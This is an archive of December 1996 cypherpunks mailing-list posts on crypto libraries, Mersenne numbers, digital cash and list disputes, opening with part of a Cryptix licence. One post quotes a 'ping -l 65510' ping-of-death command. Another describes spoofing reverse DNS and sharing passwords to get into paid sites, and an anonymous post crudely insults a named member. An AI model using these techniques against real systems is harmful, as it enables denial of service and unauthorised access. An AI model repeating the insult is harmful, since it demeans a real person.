   The library is now 100% Java, although native libraries will be loaded
   if they are present, in order to improve performance.
   
   PGP support is now being added to the library (currently most PGP
   packet types are supported, except for compressed data packets -
   anyone developing a zip compression library in Java?).
   
Mailing list

   A mailing list exists for the developers and users of this library.
   This list is very low volume, and can be joined by sending
   
          subscribe cryptix-java _your mail address_
          
   to majordomo@systemics.com.
   
   Another mailing list exists for PGP developers, and can be joined by
   sending
   
          subscribe pgp-dev _your mail address_
          
   to majordomo@systemics.com.
   
Copyright

   This library is covered by the following licence:
   
   Copyright (c) 1995, 1996 Systemics Ltd (http://www.systemics.com/) All
   rights reserved.
   
   This library and applications are FREE FOR COMMERCIAL AND
   NON-COMMERCIAL USE as long as the following conditions are adhered to.
   
   
   Copyright remains with Systemics Ltd, and as such any Copyright
   notices in the code are not to be removed. If this code is used in a
   product, Systemics should be given attribution as the author of the
   parts used. This can be in the form of a textual message at program
   startup or in documentation (online or textual) provided with the
   package.
   
   Redistribution and use in source and binary forms, with or without
   modification, are permitted provided that the following conditions are
   met:
    1. Redistributions of source code must retain the copyright notice,
       this list of conditions and the following disclaimer.
    2. Redistributions in binary form must reproduce the above copyright
       notice, this list of conditions and the following disclaimer in
       the documentation and/or other materials provided with the
       distribution.
    3. All advertising materials mentioning features or use of this
       software must display the following acknowledgement:
       
        This product includes software developed by Systemics Ltd
                (http://www.systemics.com/)
                
   
   THIS SOFTWARE IS PROVIDED BY SYSTEMICS LTD ``AS IS'' AND ANY EXPRESS
   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
   DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
   ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
   IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
   OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
   ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
   
   The licence and distribution terms for any publically available
   version or derivative of this code cannot be changed. i.e. this code
   cannot simply be copied and put under another distribution licence
   [including the GNU Public Licence.]
   
   
     _________________________________________________________________
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 2 Dec 1996 09:44:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Announce: New mailing list for PGP developers
Message-ID: <199612021747.SAA06243@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I have set up a mailing list for PGP developers.  The main topic
of conversation will be issues directly related to developing PGP
tools and libraries, such as non-standard cipher feedback modes :-/

The list can be joined by sending

	  subscribe pgp-dev _your mail address_
	  
to majordomo@systemics.com.


Best regards,

Gary Howland
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Mon, 2 Dec 1996 18:43:38 -0800 (PST)
To: asgaard@Cor.sos.sll.se (Asgaard)
Subject: Re: New payment scheme for Web access
In-Reply-To: <Pine.HPP.3.91.961202125243.16863B-100000@cor.sos.sll.se>
Message-ID: <199612030247.SAA20429@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

You say:

"...........  a very popular site could allow access only to domains
(....foo.bar) that have paid instead of blocking those who have not,
otherwise 'new' sites could circumvent it easily. On the other hand,
a proxy server inside of an allowed domain would circumvent the allowing
kind of scheme, at least for a while (until they found out about it).
Great opportunities for hacking wars.

Another payment scheme in use is to recieve passwords for closed
Web pages by voice phoning to an expensive number........."


First of all, if they block on domains; then it is only a matter
of stealing the domain. The DNS naming system is a joke for this.

Say, you want to steal my own domain; allyn.com so you can go into
the expensive pay per view web site which will allow allyn.com.

All you need to do is to change your DNS reverse lookup records
(the records which map your IP address to your name) so that
when the web site does a reverse DNS lookup at IP address
100.200.3.4 (or whatever your real IP address is); it will return
allyn.com. If you have your own name servers, this should be easy.
Further; knowing the lack of security at Internic; you could probably
go all the way and steal control of the actual domain.

The password method is a joke. A bunch of hackers get together
and chip in for the cost of one password. Then they share it.
Or, the could resort to the old fashioned social engineering
methods that have been long discussed in such forums as 2600
and other places.

Of course, this all is for discussion purposes only. You have your
own concience to live with. 

Can you really look at yourself in the mirror and sleep at night
knowing that  you stole something? I certainly can't. Once I accidentally
walked out of the corner store with a candy bar when I was a little
boy without paying for it. When I reached the house, I discovered that 
I had the candy bar in my hand and I **RAN** crying back to the store and
put it back on the shelf.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Mon, 2 Dec 1996 09:54:31 -0800 (PST)
To: "e$"@thumper.vmeng.com
Subject: Working Draft: "Using Markets to Achieve Efficient Task Distribution"
Message-ID: <32A317FF.773C2448@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Our paper on "Using Markets to Achieve Efficient Task Distribution" is
now on the web at

    http://www.systemics.com/docs/papers/task_market.html

as a working draft (please don't quote or disseminate - it is now "under
offer" for FC97).

I, at least, am going to have a break from paper writing and go have a
go at coding it, and all the other things in the queue.  However,
comments are most welcome.  Thanks to everyone who has commented so far.
--
iang
iang@systemics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Mon, 2 Dec 1996 16:58:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IP address
In-Reply-To: <199612021038.EAA02902@manifold.algebra.com>
Message-ID: <Pine.BSI.3.91.961202185629.4826A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Dec 1996 ichudov@algebra.com wrote:

> > >What is the risk of publishing your dynamic IP address to a web page while you are on line?  How vulnerable is someone just connected to the internet, w/o any server running? What attacks are feasable? --Internaut
> > 
> > Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
> > machine can be locked up or rebooted at *any* time using just PING!
> > 
> 
> Isn't is Unix that is actually vulnerable?

    I have never been able to cause more than a mild performance 
degredation by pinging a Windows 95 machine with large packets.  When 
testing the idea I kept increasing the packet size until the machine no 
longer responded, but the machine still had TCP/IP capabilities (in terms 
of transmitting data and forming connections).  Ping flooding is another 
matter though.  You probably could cause a larger performance drop.

             ____________________________________________________
            [ Bruce M. - bkmarsh@feist.com - Feist Systems, Inc. ]
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 2 Dec 1996 16:11:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A quick discussion of Mersenne Numbers
In-Reply-To: <Pine.LNX.3.94.961202203917.4458C-100000@random.sp.org>
Message-ID: <Pine.LNX.3.95.961202191034.14391B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Dec 1996, The Deviant wrote:

> On Mon, 2 Dec 1996, Paul Foley wrote:
> 
> > On Sun, 1 Dec 1996 14:10:13 -0500, Scottauge@aol.com wrote:
> >
> >    A mercenne number is of the type:
> >
> >    M(p) = 2**p -1 results in a prime when p is a prime.
> >
> > *Occasionally* results in a prime when p is prime.  (A Mersenne number
> > is any number of that form, prime or composite.  It so happens that if
> > M(p) is prime, p is prime)
> >
> >    Hopefully this will lead the way to see the pattern of prime
> >    numbers and being able to compute prime numbers in a far more
> >    efficient manner (after all a function that when given a prime
> >    number results in a prime number would be quite a kicker now
> >    wouldn't it!)
> >
> > That's easy: f(x) = x
> >
> >    The other Mersenne primes include:
> >
> >    2,3,5,7,13,17,19,31,127,61,89, and 107.
> >
> > 2, 5, 13, 17, 19, 61, 89 and 107 are not Mersenne numbers :-|
> >
> > The first few Mersenne primes are:
> > 3, 7, 31, 127, 8191, 131071, 524287, 2147483647
> 
> True.. but 1 is. 2^1-1=1

1 isn't prime.  It also isn't composite.  Same for zero.

Mark
-- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Mon, 2 Dec 1996 19:42:25 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: NEWS.COM Dispatch 12.02.96
Message-ID: <199612030323.TAA04177@central.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


***************************************

CNET's NEWS.COM DISPATCH
7:03 p.m. (PT)
Monday, December 2, 1996
San Francisco, California, USA

***************************************

WELCOME!

***************************************

The NEWS.COM DISPATCH highlights the up-to-the minute technology news
presented by NEWS.COM. It tempts readers with coverage of today's hottest
stories, news in the making, (in)credible rumors, and other indispensable
information.

For complete versions of the stories updated all day long, head over to:

   http://www.news.com/?nd

***************************************

CONTENTS

SCOOPS AND TOP STORIES
        IBM plays doctor
        Net boom eludes main street
        Battles with Gates...pricing snafus...huge quarterly loss? No
problem for AOL!
        DEC and Carrera team up to create 500-MHz workstations and servers

ANNOUNCEMENTS
        An easy way for you to customize NEWS.COM
        Late-breaking stories just a click away with Desk Top News
        Send us your questions, comments, flotsam, and jetsam

***************************************

SCOOPS AND TOP STORIES


IBM PLAYS DOCTOR
Big Blue is developing an innovative Internet "immune system" that intends
to do battle with one of the Internet's nastiest hazards - viruses.

   http://www.news.com/News/Item/0%2C4%2C5829%2C00.html?nd


NET BOOM ELUDES MAIN STREET
We've all heard the seductive hum of the buzzwords: e-commerce, online
advertising, new economic paradigm, secure commerce. And yet, many of those
who actually put their sites where their mouths are seem to find one sound
to be conspicuously absent: the happy cha-ching of the digital cash register.

   http://www.news.com/News/Item/0%2C4%2C5824%2C00.html?nd


BATTLES WITH GATES...PRICING SNAFUS...HUGE QUARTERLY LOSS? NO PROBLEM FOR AOL!
A mere six weeks after a white-knuckled corporate bungee jump during which
its stock plummeted to the 22-3/8 mark--AOL's stock rose more than 13
percent in a single day. A major factor in this comeback is the "big news"
(300,000 subscribers' worth) expected to be announced at the firm's
semiannual partners' conference tomorrow.

   http://www.news.com/News/Item/0%2C4%2C5825%2C00.html?nd

DEC AND CARRERA TEAM UP TO CREATE 500-MHz WORKSTATIONS AND SERVERS
Aiming at Internet, scientific, and multimedia markets with their insatiable
appetites for processing power, the DEC/Carrera team can boast about
offering one of the fastest processors in the world. That is, until 1997,
when the race gets even faster.

   http://www.news.com/News/Item/0%2C4%2C5818%2C00.html?nd


***************************************


ANNOUNCEMENTS


AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News. Identify the
topics, keywords, or sections you're most interested in, and Custom News
will a create a page of headlines and summaries for all stories that match
your criteria. Check it out at:

   http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1


LATE-BREAKING STORIES A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest news on the
Net? Our Desk Top News feature puts our 20 most recent stories right there
on your desktop for you to review at any time. Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd



SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a message:

   newsdispatch@cnet.com


CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 2 Dec 1996 16:46:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IP address
Message-ID: <961202194540_1353438965@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-02 02:44:30 EST, you write:

<< 
 >What is the risk of publishing your dynamic IP address to a web page while
you are on line?  How vulnerable is someone just connected to the internet,
w/o any server running? What attacks are feasable? --Internaut
 
 Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
 machine can be locked up or rebooted at *any* time using just PING!
  >>
Im not sure under what circumstances you were referring this happening in,
but I use win95 and so do friends of mine whom I ping ALL the time with their
dynamic IP address. I do this to check the time before we do some online
gaming across the net. Mind you.... I dont have to be connected to a KALI
gaming server to do this.. He lets me know his IP address via his 2nd phone
line, I log on the my ISP, goto dos and PING him.. and voila!
                                       Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Tue, 3 Dec 1996 16:35:45 -0800 (PST)
To: vitamin@best.com
Subject: Re: your mail
In-Reply-To: <2.2.16.19961202024920.3fb73e1e@best.com>
Message-ID: <Pine.LNX.3.95.961202201610.370C-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


Talk to your credit card company, explain to them the whole story,
refuse to pay these unauthorized charges. You should get satisfaction.

The moral here is, however, that nothing beats putting things down on
paper. You SHOULD have sent a letter of cancellation, I'll bet dollars
to donuts that the contract you signed stated that you would send
cancellation notice IN WRITING. 

cheers, kinch


On Sun, 1 Dec 1996 vitamin@best.com wrote:

> Date: Sun, 01 Dec 1996 18:49:20 -0800
> From: vitamin@best.com
> To: cypherpunks@toad.com
> 
> 
> I apologize if this is off topic.
> 
> I received free one month trial in July from Netcom and in mid July I
> canceled my account with
> Netcom due to lousy customer service.  When I called I was treated rudely
> because of 
> canceling netcom.   I called again the next day and the person who answered
> the phone 
> apologized me for the behaviour of the previous employee and I was told my
> account 
> will be canceled.   Low and behold come July I got my credit card statement and 
> netcom had billed me.  I promtly called them and was assured that my account
> would 
> be cancelled.  Come September I was billed again for August and September.  
> Once again I called and she assured me  it would be cancelled.   Again, it
> was not.   
> Come October they still billed me.  In my November statement they are still
> billing me.  
> 
> I prefer L.A.  Better Business Bureau and District Attorney emails and
> physical addresses.
> 
> Someone please help me!!!!!
> 
> Thank You 
> 

Key fingerprint =  CE 54 C3 93 48 C0 74 A0  D5 CA F8 3E F9 A3 0B B7 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 2 Dec 1996 17:24:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IP address
Message-ID: <961202202352_1319999051@emout11.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-02 20:11:05 EST, you write:

<< try ping -l 65510 host.name.edu
  >>
from what ive heard, the sytem going down from a ping command is only when
you ping with a wrong size packet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 2 Dec 1996 13:01:01 -0800 (PST)
To: Paul Foley <mycroft@actrix.gen.nz>
Subject: Re: A quick discussion of Mersenne Numbers
In-Reply-To: <199612020412.RAA00976@mycroft.actrix.gen.nz>
Message-ID: <Pine.LNX.3.94.961202203917.4458C-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Dec 1996, Paul Foley wrote:

> On Sun, 1 Dec 1996 14:10:13 -0500, Scottauge@aol.com wrote:
> 
>    A mercenne number is of the type:
> 
>    M(p) = 2**p -1 results in a prime when p is a prime.
> 
> *Occasionally* results in a prime when p is prime.  (A Mersenne number
> is any number of that form, prime or composite.  It so happens that if
> M(p) is prime, p is prime)
> 
>    Hopefully this will lead the way to see the pattern of prime
>    numbers and being able to compute prime numbers in a far more
>    efficient manner (after all a function that when given a prime
>    number results in a prime number would be quite a kicker now
>    wouldn't it!)
> 
> That's easy: f(x) = x
> 
>    The other Mersenne primes include:
> 
>    2,3,5,7,13,17,19,31,127,61,89, and 107.
> 
> 2, 5, 13, 17, 19, 61, 89 and 107 are not Mersenne numbers :-|
> 
> The first few Mersenne primes are:
> 3, 7, 31, 127, 8191, 131071, 524287, 2147483647

True.. but 1 is. 2^1-1=1


 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Try `stty 0' -- it works much better.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqM+rDCdEh3oIPAVAQHFAAf/RZmwPtfhTwZNhVUhQvNcWBU4agpcK7Tt
VwULhdS80wcwKr4bwtr/EcJlKR9h9pYvkrB4orQLCMOXoeMBJy2Hz0AwVKyjuWh+
BpvbHHQDd66kcpVEpRBbw5biCYuC5nW5uEtZKvidTgTl9zyh9DcJAv3OBdNwqSjN
61MbNX0WbMDTv/2BpVha4NPAcyPs78xNLzARDpASHV8kSCExDzcPsytu8/g/L0xZ
7fF9OIhqbBJM9KR4Qo7XjcV4dF2t0cCRAicJFf34ZkfHx2NBagYBNUIfLBPcgYWB
pUuUxDp4uy2MEAKI3GBYuZ/yXuKnQoBxznO+ltfB37MtVDrzUlq4aw==
=GzxY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 2 Dec 1996 21:34:31 -0800 (PST)
To: bryce@digicash.com
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199612021544.QAA12207@digicash.com>
Message-ID: <32A3BBD6.1ECA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
> > Now I've gotcha!  If I, Dale Thorn, an ordinary person (not a commercial
> > mailer), realize somehow what your snail mail address is (an analogy),
> > and I send you a personal letter, are you saying I don't have the "right"
> > to do so?  Even if I am aware that you redistribute the letter, as, say,
> > a newspaper such as the L.A. Times would?

> Yes this is a fine analogy.  You have the right to send
> whatever letters you want; you don't have the right to demand
> that any particular thing be _done_ with those letters once
> they arrive, in the absence of some contract to the contrary.

In the interest of reducing the amount of argument, let's speak more
precisely:  I think people *do* have the right to demand such a thing,
although they do *not* necessarily have the right to force such a thing.
Perhaps there is a thin line between "demand" and "protest", but most
subscribers should be able to figure it out.

> > I'm guessing that what you're saying is something to do with the content
> > or size of such a mailing, yes?

> Noooo...  What I was saying was that even such a simple service
> as a mailing list raises some complex issues about agency and
> responsibility.  Did _you_ send MMF to all those people, or did
> Gilmore?  What if Gilmore had a MMF filter in place?  What if
> you evaded it?  What if Gilmore only broadcasts signed messages
> and you signed the MMF?  What if you paid to have it broadcast?

I can't argue the responsibility part.  As far as the size issue, it was
raised (sadly) several days and hundreds of postings *after* Dimitri was
excommunicated from the list, by none other than T.C. May.  Tsk, tsk.

> So what _I'm_ saying is that there are some complex issues
> about this kind of cyberspatial event, but that the realspace
> substrate is relatively simple-- it's Gilmore's computer and
> you have no moral authority to demand that he do or not do any
> particular thing with it.

I made note to this list time and time again requesting that people not
state the obvious - who owns what hardware and what rights they have to
pull the plug or whatever.  I seriously doubt that even the least
intelligent cypherpunk would misunderstand such a thing. Do you really
believe that myself and other cypherpunks want to "seize" John's equip-
ment, morally or otherwise?  You are correct about certain issues being
complex, but one of the big failings of the crowd who supported Gilmore
on this action was their failure to understand the point I've made here -
that we *do* understand basic property rights, etc.

> In the following, you appear to take exception to both of these
> claims, or at least to the first one-- I'm not sure.

> > But whatever the case, I'm not "doing something with" your mailbox if
> > I send you a snail mail letter, and I'm not "doing something with" your
> > computer if I send you a posting. It's you who know the result of opening
> > up your computer to the phone lines, and it's up to you to post *your*
> > "rules", and to date, I don't recall any postings from John Gilmore to
> > me or the list regarding such rules, just a few little tin-plated
> > dictators doing it in his name.

> I'm still not sure if you are just prone to colorful rhetoric,
> or if I have really upset you with something I've said.  If the
> latter, I still don't understand what, exactly.

How can I say this better?  Myself and a number of other people would
really have appreciated it if John had defended himself.  The fact of
all these other would-be experts on cyber-rights and morals preaching
to the list on behalf of Gilmore, and Gilmore being silent, argues
(not proves, just argues) heavily in favor of Dimitri et al.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 2 Dec 1996 22:04:35 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: denial of service and government rights
In-Reply-To: <Pine.SUN.3.94.961202123721.1459B-100000@polaris>
Message-ID: <32A3BDED.6C81@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> On Mon, 2 Dec 1996, Dale Thorn wrote:
> > > What you're talking about is contempt of congress.  This is not "fraud."
> > > "I had no idea what I was talking about, but as luck would have it I was
> > > right anyhow." Here, have a bozo button.

> > I was right, and you just can't stand it, can you?  I think the shoe fits
> > you, Mr. Clown, so wear it in "good health".

> Actually, you were not right.  Your claim was that this somehow
> constituted a conspiracy.  I was merely pointing out that even if your
> version of events was correct (which I hardly conceed), you still had no
> clue what you were talking about when you began and just happened to
> "fall" into the answer when your legs were knocked out from under you.

Normally, when someone doesn't know when to give up (you and Sandy S. are
two who come to mind), I just drop it.  But I thought I'd let you know
what I think of your "Argumentum ad Nauseam".  Education is *not* a
substitute for intelligence and common sense, by the way.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LOGOS <logos@c2.net>
Date: Mon, 2 Dec 1996 22:04:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Logos here
Message-ID: <Pine.BSF.3.91.961202220347.2616A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Sovereign collegues,

     I am Logos. I have adopted this pseudonym to conceal my
'true name'. I want the ideas which I shall be espousing
to stand or fall on their own merits and not on the basis
of biases that my name, sex, ethnicity, etc. might otherwise
elicit. I hope my contributions to this list will be seen as
positive by most list members.
     I intend to limit my postings to only two meta-topics:
decorum and logic. In other words, the way we speak to each
other and the quality of our argumentation.

Decorum

     From time to time, I will 'call' posters on their
intemperate use of rude or provocative language. I believe
Cypherpunks should be a market place of ideas, not a forum
for egos and insults.
     The two houses of the American congress have adopted
rules of decorum. Members may be censored or expelled for
personal attacks and verbal abuse of other members. This
was mandated for a very practical reason. It was realized
that insults, profanity, 'fighting words', etc. could get so
out of hand that they could interfer with the legitimate
work of the congress. While some might say that in the case
of the congress, this would be a good thing, I believe in
the case of Cypherpunks, it is a bad thing.
     I, therefore, call upon each Cypherpunk list members to
personally adopt such a code of conduct for themselves.  If
Democrats can refer to Representative Gingrich as 'my
esteemed collegue' and Republicans can talk about the
'honorable' Ted Kennedy, I see no reason that we cannot
treat Tim May and Dimitry Vilus with similar respect and
courtesy.  What is at stake is far more important than egos.
Cypherpunks defeated Clipper, but of late they have only
defeated themselves.

Logic

     The average reader of this list has sufficient
education and intelligent to understand the most informal
logical falacies. Yet one sees such falacies committed here
with disapointing regularity. I will post definitions of the
most common falacies and will use examples found on this
list as illustrations. If we are to be persuasive among
ourselves and with others, we need to be rigorous in our
thought processes.

I would be honored to hear your thoughts on this post.

Logos out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 2 Dec 1996 19:23:27 -0800 (PST)
To: perry@piermont.com
Subject: ANNOUNCEMENT: New low-noise cryptography mailing list
Message-ID: <199612030316.WAA04403@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



[Sorry that this is several weeks late, folks.]

"Cryptography" is a low-noise mailing list devoted to cryptographic
technology and its political impact.

WHAT TOPICS ARE APPROPRIATE:
  "On topic" discussion includes technical aspects of cryptosystems,
  social repercussions of cryptosystems, and the politics of
  cryptography such as export controls or laws restricting cryptography.

  Discussions unrelated to cryptography are considered "off topic".

  If you subscribe, please try to keep your postings "on topic". In
  order to assure that the quality of postings to the mailing list
  remains high, repeated postings "off topic" may result in action
  being taken by the list moderators.

MODERATION POLICY:
  In order to keep the signal to noise ratio high, the mailing list
  will be moderated during its initial weeks of operation. This will
  be changed if it appears that the list will remain on topic without
  moderation.

TO SUBSCRIBE: send mail to
     majordomo@c2.net
  with the line
     subscribe cryptography
  in the body of your mail. If you wish to subscribe a mailing
  address other than the one you are sending from, send a message with
  the line
     subscribe cryptography [address]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 2 Dec 1996 22:35:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Most "digital cash" does not deserve the name
In-Reply-To: <84936010217079@cs26.cs.auckland.ac.nz>
Message-ID: <v03007801aec97a0793e5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM -0500 11/30/96, William H. Geiger III wrote:

[stuff about various non-anonymous "digital cash" systems snipped]


><sigh> Big Brother comming to a bank near you.
>
>Does anyone understand the implications of a society moving to an
>electroinc cash based system??

Yes, many people understand. See messages over the past several years on
this list (before the S/N dropped to recent historic lows). See the many
discussions here and elsewhere of _real_ "digital cash."

"Digital cash" and "electronic commerce" are such hot concepts now that all
sorts of non-anonymous, fully traceable systems are being touted as
"digital cash."


>All trasactions will be recorded, moitored, tracked & analysed. This is
>not just the government that one has to worry about but corporations also.
>
>Insurance industry:
>
>- Gee Mr. Jones seems that you buy too much junk food & red meat. Our
>actuaries say this makes you a "high risk".
>
>- Gee Ms. Smith you speend too much money at the bars. Our actuaries say
>you are a high risk for DUI & accidents.

These are indeed reasons to someday be even more concerned than now about
traceable transactions.

(Just for the record, what the hypothetical insurance companies and
employers are doing by using data they have obtained should not, in a free
society, be illegal in any way. All information contributes to
decision-making, about loans, credit, insurance, employment, etc. In a free
society, it is up to people to not disclose that which they do not wish
remembered.)

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 2 Dec 1996 22:54:28 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A3BDED.6C81@gte.net>
Message-ID: <Pine.SUN.3.91.961202223742.24305G-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Dec 1996, Dale Thorn wrote:

> Normally, when someone doesn't know when to give up (you and
> Sandy S. are two who come to mind), I just drop it...

Wrong AGAIN.  I gave up on Dale a long time ago.  That's why *I*
dropped it.  


 S a n d y

      "Never underestimate the power of human stupidity"
              				--Robert Heinlein

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 2 Dec 1996 23:57:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: [IMPORTANT NOTICE] Mercenne primes
Message-ID: <199612030742.XAA12459@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May studied yoga back-streching exercises for five
years so he could blow himself (nobody else will).

       ' ' ' '
       ^-O-O-^
    -ooO--U--Ooo- Tim May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 2 Dec 1996 23:49:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Modulating the FM noise spectrum considered infeasible
In-Reply-To: <849204012.65013.0@fatmans.demon.co.uk>
Message-ID: <v03007802aec98b7eae7e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 PM +0100 11/29/96, Pavel Korensky wrote:
>paul@fatmans.demon.co.uk wrote:
>>
>> I`m not entirely sure about the possibility of correlations in any of
>> these sources but they aren`t really a good idea because all can be
>> accessed by someone else. eg. Steal your random noise audio tape,
>> sample dolby decoded sound at the same time as you etc.
>
>And what if I will use FM receiver, tuned on some channel where is the noise.
>If the potentional attacker don't know the what channel was tuned, he is not
>able to reproduce this IMHO. Of course, maybe it is possible to record the
>whole
>spectrum to tapes, but I think that the noise will change when recorded and
>played back from tape.

Not to mention the point that an external attacker--say, the NSA van parked
across the street--will under no circumstances be able to measure "the"
spectrum: his antennas cannot possibly measure the signals (at the lower
bits) seen by the FM receiver, noise source local to the computer, whatever.

(Obviously other SIGINT/TEMPEST methods might be able to read the bits in
other ways, but this is a different issue. Ditto for black bag
cryptanalysis, which is usually the most cost-effective approach.)

